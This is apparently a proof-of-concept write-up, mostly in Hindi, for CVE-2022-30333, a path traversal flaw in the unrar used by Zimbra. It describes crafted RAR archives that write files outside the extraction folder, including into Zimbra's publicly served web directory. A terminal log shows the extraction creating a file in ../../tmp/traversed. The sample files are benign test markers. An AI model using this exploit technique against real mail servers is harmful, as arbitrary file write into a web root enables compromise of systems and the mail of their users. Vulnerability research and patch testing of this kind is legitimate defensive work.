
CVE-2022-30333 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Zimbra द्वारा उपयोग किए जाने वाले unrar में एक पाथ ट्रैवर्सल भेद्यता है, जो क्राफ्टेड RAR आर्काइव के माध्यम से मनमानी फ़ाइल लेखन का प्रदर्शन करता है।
CVE-2022-30333 का परीक्षण करने के लिए नमूना फ़ाइल
Sample.rar : यदि आप Linux पर परीक्षण करना चाहते हैं। जब आप निकालते हैं, तो यह ../../tmp/traversed में trav बनाता है। कृपया सुनिश्चित करें कि Sample.rar निकालने से पहले ../../tmp/traversed निर्देशिका मौजूद है।
exp.rar : यदि आप Zimbra मेल सर्वर पर परीक्षण करना चाहते हैं। जब आप निकालते हैं, तो यह /opt/zimbra/jetty_base/webapps/zimbra/public/ में moo.txt बनाता है। आप इस फ़ाइल को https://zimbra_mail_domain/public/moo.txt पर एक्सेस कर सकते हैं।
mkdir ../../tmp/traversed (the destination folder must exsist before unrar)
ls -la ../../tmp/traversed/
total 8
drwxrwxr-x 2 ubuntu ubuntu 4096 Jul 4 02:44 .
drwxrwxr-x 4 ubuntu ubuntu 4096 Jul 4 02:40 ..
unrar x exp.rar
UNRAR 6.10 beta 1 freeware Copyright (c) 1993-2021 Alexander Roshal
Corrupt header is found
sym - the file header is corrupt
Extracting from exp.rar
Corrupt header is found
sym - the file header is corrupt
Extracting sym OK
Extracting sym/trav OK
Total errors: 4
ls -la ../../tmp/traversed/
total 12
drwxrwxr-x 2 ubuntu ubuntu 4096 Jul 4 02:47 .
drwxrwxr-x 4 ubuntu ubuntu 4096 Jul 4 02:40 ..
-rw-rw-r-- 1 ubuntu ubuntu 14 Jul 4 02:44 trav
cat ../../tmp/traversed/trav
"traversed"